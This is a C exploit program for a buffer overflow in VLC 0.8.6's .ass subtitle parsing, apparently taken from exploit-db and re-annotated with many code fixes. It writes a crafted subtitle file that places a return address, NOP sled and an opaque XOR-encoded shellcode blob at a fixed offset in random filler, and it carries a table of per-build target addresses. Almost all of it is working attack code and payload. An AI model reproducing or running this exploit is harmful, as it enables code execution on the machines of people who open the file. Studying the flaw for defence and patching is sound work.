VideoLAN VLC Media Player 0.8.6 a/b/c/d (Win32 Universal) – ‘.ass’ Local Buffer Overflow

  • 作者: fl0 fl0w
    日期: 2010-01-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11174/
  • /*[%]VLC 0.8.6 [a][b][c][d] .ASS file buffer overflow exploit (win32 universal)
    [%]Reported by the author as working on any Win32 OS, but only tested on Windows XP SP2. The return addresses in RET[] are per-build, so "universal" should not be taken at face value.
    
    [%]My doctor said that I have serious problems, but I think he's full of it
     because the voices tell me I'm ok!*/
    #include<stdint.h>
    #include<stdio.h>
    #include<stdlib.h>   /* malloc/free, exit, atoi/strtol, rand, system: used below but never declared */
    #include<string.h>
    
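    /* Output file names and payload offsets.
     * The original listing had the whitespace between macro name and value
     * stripped (e.g. "#define EIP_OFFSET163852"), which defined a macro named
     * EIP_OFFSET163852 with an empty body and left EIP_OFFSET undefined. */
    #define File "subtitle666.ass"      /* crafted subtitle written by buildF() */
    #define OGGfile "openme.ogg"        /* companion media file written by oggf() */
    /* helper macros; the IF() parameter was originally named NULL, which
     * shadowed the NULL macro inside the replacement list */
    #define IF(x,y) if((x)==(y))
    #define FOR(i,a,b) for((i)=(a);(i)<(b);++(i))
    #define WHILE(z) while((z)>0)
    /* reads the first byte of whatever `i` is in scope at the expansion site */
    #define is_bigendian() ((*(char*)&i)==0)
    /* byte offsets into the random filler that buildF() generates */
    #define EIP_OFFSET 163852
    #define SEH_OFFSET 165248       /* unreferenced in this listing */
    #define NEXTSEH_OFFSET 165244   /* unreferenced in this listing */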
    /*-------------payload and data---------*/
     /* Opaque 160-byte payload supplied by the original author (no NUL bytes,
      * so strlen() and sizeof-1 agree). The leading bytes look like a
      * fnstenv-based GetPC stub followed by an XOR decode loop over the rest;
      * what the decoded code does is not stated anywhere in this listing.
      * Do not execute outside an isolated lab. */
     char vlcshellcode[] =
         "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d"
         "\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c"
         "\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90"
         "\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4"
         "\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf"
         "\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd"
         "\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52"
         "\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1"
         "\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b"
         "\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9";
     /* SSA/ASS subtitle header that precedes the overflow filler in the
      * output file. The script body ends with a bare "Dialogue:" line whose
      * text field is what buildF() extends with the long random run; only 16
      * filler bytes live here (the original comment claiming 165254 bytes
      * described buildF's output, not this literal). */
     char data[] =
         "[Script Info]\n"
         "; Script generated by Aegisub\n"
         "; http://www.aegisub.net\n"
         "Title: Neon Genesis Evangelion - Episode 26 (neutral Spanish)\n"
         "Original Script: RoRo\n"
         "Script Updated By: version 2.8.01\n"
         "ScriptType: v4.00+\n"
         "Collisions: Normal\n"
         "PlayResY: 600\n"
         "PlayDepth: 0\n"
         "Timer: 100,0000\n"
         "Video Aspect Ratio: 0\n"
         "Video Zoom: 6\n"
         "Video Position: 0\n"
         "[V4+ Styles]\n"
         "Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding\n"
         "Style: DefaultVCD, Arial,28,&H00B4FCFC,&H00B4FCFC,&H00000008,&H80000008,-1,0,0,0,100,100,0.00,0.00,1,1.00,2.00,2,30,30,30,0\n"
         "[Events]\n"
         "Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text\n"
         "Dialogue:"
         /* sixteen 0x41 bytes; the real filler is appended by buildF() */
         "AAAAAAAAAAAAAAAA";
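     /* Startup banner printed by main() when no target is given.
      * The original said "VLC 0.6.8x", contradicting the title, the RET[]
      * table and the header comment, which all name 0.8.6. */
     char banner[] =
         "******************************************************************\n"
         " VLC 0.8.6x Buffer overflow exploit(win32 universal)*\n"
         " *\n"
         "by fl0 fl0w*\n"
         "******************************************************************\n";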
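     /* Usage text printed by main() when argv[1] is missing.
      * Targets are selected by index into RET[]; main() handles 0..4 and
      * Targetprint() lists index 0 first, so the original "1/2/3/4" hint
      * omitted a valid choice. */
     char arguments[] =
         "---------------------------\n"
         "Too few args!\n"
         "sploit.exe [target 0/1/2/3/4]\n"
         "---------------------------\n";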
     
    // Output layout produced by buildF(): data (subtitle header) followed by 165267 random
    // bytes, with the return address, a 10-byte NOP sled and the shellcode written at
    // EIP_OFFSET inside that random run.
    /*--------global variables----------*/
     /* File-scope state shared between main() and the builders. */
     char bf[4];          /* raw in-memory bytes of the chosen return address (filled by cpy) */
     char b[1000000];     /* assembled overflow filler: random text + bf + NOP sled + shellcode (see buildF) */
     int input;           /* target index parsed from argv[1] */
     int i;               /* loop index used through the FOR macro */
     int t;               /* loop index used by Targetprint */

     /* The following are declared but never referenced in this listing. */
     char c[1000000];
     char d[1000000];
     char f[1000000];
     char seh[]  = "\x87\x75\x40\x4B";   /* named like an SEH handler address; unused */
     char nseh[] = "\x38\xFA\x74\x02";   /* named like a next-SEH pointer; unused */
     
     /*-------prototypes----------*/
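     /* Forward declarations for the helpers defined below main().
      * buildF is declared with the parameter its definition actually takes
      * (the original used an empty "()" list), and reverseInt is declared
      * here because main() called it before any declaration was visible. */
     int buildF(unsigned int retn);              /* writes File; retn is ignored */
     int cpy(unsigned int source, char *dest);   /* copies the 4 bytes of source into dest */
     void print(char *msg);                      /* "[*]msg" on stdout */
     void gen_random(char *s, const int len);    /* len random alphanumerics + NUL */
     unsigned int getFsize(FILE *g, char *gname); /* size of the file at gname */
     int cpystr(char *dest, int str, int len);   /* unreferenced helper */
     int oggf(char *fname);                      /* writes the companion .ogg */
     int Targetprint(void);                      /* lists RET[] entries */
     int reverseInt(unsigned int i);             /* byte-swap on little-endian hosts */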
     
     /*--------ogg file format---------*/
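    /* Ogg page header as written by oggf(): the fixed 27-byte page header plus
     * a single-entry segment table, 28 bytes in all, which is what the
     * original "28 bytes" comment intended. The struct is packed to 1-byte
     * alignment because without it the compiler inserts padding before the
     * 64-bit Gp field on common ABIs and sizeof(ogg) no longer matches the
     * on-disk layout. The original listing also had the whitespace between
     * type and field name stripped (e.g. "uint8_tVer"), which does not compile. */
    #pragma pack(push, 1)
    typedef struct aa
    {
        uint32_t Cp;   /* capture pattern; oggf() stores 0x5367674F, the bytes "OggS" on a little-endian host (32 bits) */
        uint8_t  Ver;  /* stream structure version (8 bits) */
        uint8_t  H;    /* header type flags (8 bits) */
        uint64_t Gp;   /* granule position (64 bits) */
        uint32_t Bsn;  /* bitstream serial number (32 bits) */
        uint32_t Psn;  /* page sequence number (32 bits) */
        uint32_t C;    /* page checksum (32 bits) */
        uint8_t  Ps;   /* number of segment table entries (8 bits) */
        uint8_t  St;   /* the single segment table entry carried here (8 bits) */
    } ogg;
    #pragma pack(pop)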
    /*------targets------------*/
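     /* Per-build return addresses. eip is the 4-byte value that cpy() copies
      * into bf and buildF() writes at EIP_OFFSET; presumably it points into
      * the target's address space at a location that transfers control to the
      * NOP sled, but that cannot be verified from this listing. etype is the
      * name shown by Targetprint(); a NULL etype terminates the table. */
     struct
     {
         unsigned int eip;
         char *etype;
     } RET[] =
     {
         { 0x026DFA38, "VLC 0.8.6 c" },
         { 0x0263FA38, "VLC 0.8.6 b,d" },
         { 0x0267FA38, "VLC 0.8.6 a" },
         { 0x0267FA38, "VLC 0.8.6 b test1" },   /* same address as the 0.8.6 a entry in the original; not verified here */
         { 0x02B6FA38, "VLC 0.8.6 RC1" },
         { 0, NULL }   /* sentinel; the original wrote {NULL, NULL}, assigning a pointer constant to eip */
     };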
    /*------main--------*/
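    /* Entry point: sploit.exe <target index>.
     * Validates the target index, loads the matching RET[] address into bf,
     * then writes the subtitle file and the companion .ogg. Prints the usage
     * text and the target list (then exit(0)) when the argument is missing or
     * invalid. The original parsed argv[1] with atoi() and indexed RET[] with
     * the result unchecked, so "5", "-1" or non-numeric input read past the
     * table. It also called reverseInt() and discarded the return value, so
     * the bytes placed in bf were always the host's native order; that
     * behaviour is kept (cpy() copies the raw bytes) and the dead call dropped. */
    int main(int argc, char *argv[])
    {
        int ntargets = 0;
        while (RET[ntargets].etype != NULL)
            ++ntargets;

        if (argc < 2) {
            system("CLS");  /* cosmetic console clear; fixed string, no user data reaches the shell */
            printf("%s%s", banner, arguments);
            Targetprint();
            exit(0);
        }

        /* strtol so that trailing junk and out-of-range values are rejected
         * instead of silently selecting index 0 or reading past RET[] */
        char *end = NULL;
        long sel = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || sel < 0 || sel >= ntargets) {
            printf("%s", arguments);
            Targetprint();
            exit(0);
        }
        input = (int)sel;

        cpy(RET[input].eip, bf);
        printf("[!]Using : %s retaddress\n", RET[input].etype);

        buildF(RET[input].eip);  /* argument is ignored by buildF; bf already holds the address */
        oggf(OGGfile);
        getchar();  /* presumably to keep a console window open until a key is pressed */

        return 0;
    }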
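    /* Write the crafted subtitle file named by File.
     * Output = data (subtitle header) + FILLER_LEN random alphanumerics, with
     * [bf (4 bytes)][SLED_LEN x 0x90][vlcshellcode] overwritten into the random
     * run at EIP_OFFSET (163852 + 4 + 10 + 160 = 164026 <= FILLER_LEN, so the
     * implant stays inside the filler). retn is unused: the return-address
     * bytes are already in bf, filled by cpy() in main(). Prints a message and
     * exit(0)s if the file cannot be created or written. Returns 0.
     * Fixes versus the original: it free()d the static array `data`
     * (undefined behaviour), passed a size to printf() with no matching
     * conversion, and never checked the write. */
    int buildF(unsigned int retn)
    {
        enum { FILLER_LEN = 165267, SLED_LEN = 10 };
        (void)retn;

        FILE *out = fopen(File, "wb");
        if (out == NULL) {
            print("File .ass error!");
            exit(0);
        }

        gen_random(b, FILLER_LEN);  /* also NUL-terminates at b[FILLER_LEN] */
        memcpy(b + EIP_OFFSET, bf, sizeof bf);
        memset(b + EIP_OFFSET + sizeof bf, 0x90, SLED_LEN);
        /* sizeof-1 rather than strlen: same value here (the payload has no NUL
         * bytes) but it cannot silently truncate if the payload is replaced */
        memcpy(b + EIP_OFFSET + sizeof bf + SLED_LEN, vlcshellcode, sizeof vlcshellcode - 1);

        if (fputs(data, out) == EOF || fwrite(b, 1, FILLER_LEN, out) != FILLER_LEN) {
            print("File .ass write error!");
            fclose(out);
            exit(0);
        }
        long written = ftell(out);
        if (fclose(out) != 0) {
            print("File .ass close error!");
            exit(0);
        }

        printf("[#]ASS file DONE! (%ld bytes)\n", written);
        return 0;
    }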
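    /* Write a single Ogg page header to fname with the fixed field values the
     * original used (the checksum is copied verbatim, not recomputed; the
     * header-type value 0x02 is presumably the Ogg beginning-of-stream flag).
     * Prints a message and exit(0)s if the file cannot be created or written.
     * Returns 0.
     * The original malloc()ed the header (unchecked, never freed) and then
     * called fwrite(W666, sizeof(W666), 9, g): sizeof of the *pointer* times
     * nine, i.e. 36 bytes on Win32 read from a smaller heap object. The
     * header is now a stack object written exactly once with its real size;
     * how many bytes that is depends on whether the ogg struct is packed. */
    int oggf(char *fname)
    {
        FILE *out = fopen(fname, "wb");
        if (out == NULL) {
            print("File ogg error");
            exit(0);
        }

        ogg hdr = {
            .Cp  = 0x5367674F,  /* "OggS" as a little-endian dword */
            .Ver = 0x00,
            .H   = 0x02,
            .Gp  = 0x00000000,
            .Bsn = 0x000060B8,
            .Psn = 0x00000000,
            .C   = 0xA403D2F8,
            .Ps  = 0x01,
            .St  = 0x1E,
        };

        if (fwrite(&hdr, sizeof hdr, 1, out) != 1) {
            print("File ogg write error");
            fclose(out);
            exit(0);
        }
        long written = ftell(out);
        if (fclose(out) != 0) {
            print("File ogg close error");
            exit(0);
        }

        printf("[#]OGG file DONE! (%ld bytes)\n", written);
        return 0;
    }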
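    /* Copy the 4 in-memory bytes of source (host byte order) into dest.
     * dest must hold at least 4 bytes; the only caller passes the global bf[4].
     * Returns the number of bytes copied (4).
     * The original copied len+1 = 5 bytes, reading one byte past the 4-byte
     * parameter and writing one byte past the end of bf. */
    int cpy(unsigned int source, char *dest)
    {
        memcpy(dest, &source, sizeof source);
        return (int)sizeof source;
    }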
    /* Emit msg on stdout as a "[*]"-prefixed status line. */
    void print(char *msg)
    {
        fprintf(stdout, "[*]%s\n", msg);
    }
    
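    /* Fill s[0..len) with pseudo-random alphanumerics and NUL-terminate at
     * s[len]; s must hold len + 1 bytes. rand() is never seeded in this
     * program, so the sequence is the same on every run (matches the
     * original). A len <= 0 yields an empty string: the original's loop also
     * ran zero times, but it then wrote s[len] for negative len, i.e. before
     * the buffer. Uses a local index instead of the global `i`. */
    void gen_random(char *s, const int len)
    {
        static const char alphanum[] =
            "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
        const size_t nsym = sizeof alphanum - 1;  /* exclude the terminator */
        int k;

        for (k = 0; k < len; ++k)
            s[k] = alphanum[(size_t)rand() % nsym];
        s[len < 0 ? 0 : len] = '\0';
    }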
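    /* Return the size in bytes of the file at gname. Prints a message and
     * exit(0)s if it cannot be opened; returns 0 if the size cannot be read.
     * The g parameter is ignored (kept for the existing callers' signature):
     * the original overwrote it with a fresh fopen() and never closed that
     * stream, leaking a FILE per call. */
    unsigned int getFsize(FILE *g, char *gname)
    {
        (void)g;

        FILE *in = fopen(gname, "rb");
        if (in == NULL) {
            print("File error at reading");
            exit(0);
        }

        long end = -1;
        if (fseek(in, 0, SEEK_END) == 0)
            end = ftell(in);
        fclose(in);

        return end < 0 ? 0u : (unsigned int)end;
    }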
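    /* Return i with its byte order reversed on a little-endian host, or
     * unchanged on a big-endian one. The result is returned as int, so for
     * values with the top bit set the conversion is implementation-defined;
     * callers should cast back to unsigned. Note that main() in the original
     * discarded this function's result, so the swap never affected the output.
     * Fixes versus the original: endianness was detected by probing the value
     * being converted (any input with a zero low byte came back unswapped on
     * little-endian hosts), and (int)c1 << 24 overflowed signed int for
     * c1 >= 128. */
    int reverseInt(unsigned int i)
    {
        const unsigned int probe = 1u;
        const int host_is_big_endian = (*(const unsigned char *)&probe == 0);

        if (host_is_big_endian)
            return (int)i;

        unsigned int swapped =
            ((i & 0xFFu) << 24) |
            (((i >> 8) & 0xFFu) << 16) |
            (((i >> 16) & 0xFFu) << 8) |
            ((i >> 24) & 0xFFu);
        return (int)swapped;
    }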
    /* Fill dest with len + 1 copies of the byte value str and return len.
     * Note the +1: dest must hold len + 1 bytes. Unreferenced in this listing. */
    int cpystr(char *dest, int str, int len)
    {
        const size_t span = (size_t)(len + 1);
        memset(dest, str, span);
        return len;
    }
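    /* List the RET[] targets as "[!]name - [0xADDRESS] - index", one per line,
     * stopping at the NULL sentinel. Returns 0.
     * The original printed eip with %d after a literal "0x" (a decimal number
     * dressed as hex), hard-coded five entries, and fell off the end of a
     * non-void function. */
    int Targetprint(void)
    {
        print("Targets are:");
        for (t = 0; RET[t].etype != NULL; t++)
            printf("[!]%s - [0x%08X] - %d\n", RET[t].etype, RET[t].eip, t);
        return 0;
    }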